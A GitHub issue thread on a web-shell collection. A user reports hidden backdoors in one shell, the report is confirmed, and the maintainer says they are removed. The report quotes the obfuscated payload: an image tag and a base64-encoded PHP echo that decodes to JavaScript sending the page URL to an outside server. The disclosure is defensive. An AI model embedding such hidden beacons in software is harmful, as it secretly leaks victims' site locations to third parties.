### ISSUE TITLE
Have a hiden native backdoor log

### ISSUE THREAD

**Issue by WHK102** [tennc/webshell#23]
In the code `<img src=\"http://emp3ror.com/images/emplogo1.gif\">` send the referer of path to emp3ror.com server. The administrator catch all referers into emp3ror.com server log. Dont be evil.

Other backdoor: `<?php echo base64_decode('PFNDUklQVCBTUkM9JiN4NjgmI3g3NCYjeDc0JiN4NzAmI3gzYSYjeDJmJiN4MmYmI3g3NyYjeDc3JiN4NzcmI3gyZSYjeDZjJiN4NmYmI3g2MyYjeDYxJiN4NmMmI3g3MiYjeDZmJiN4NmYmI3g3NCYjeDJlJiN4NmUmI3g2NSYjeDc0JiN4MmYmI3g2OSYjeDYyJiN4NmUmI3g2NSYjeDZjJiN4NjUmI3g3MiYjeDJmJiN4NzkmI3g2MSYjeDdhJiN4MmUmI3g2YSYjeDczPjwvU0NSSVBUPiANCg==');?>`

The render is: `a=new/**/Image();a.src='http://localroot.net/ibneler/index.php?a='+escape(location.href);`

This send the referer site to other persons.

This shell is dirty.

**Comment by Clon3d** [comment]
Can confirm, This is not the only one either.

**Comment by tennc** [comment]
thanks,  i del backdoor~ @WHK102
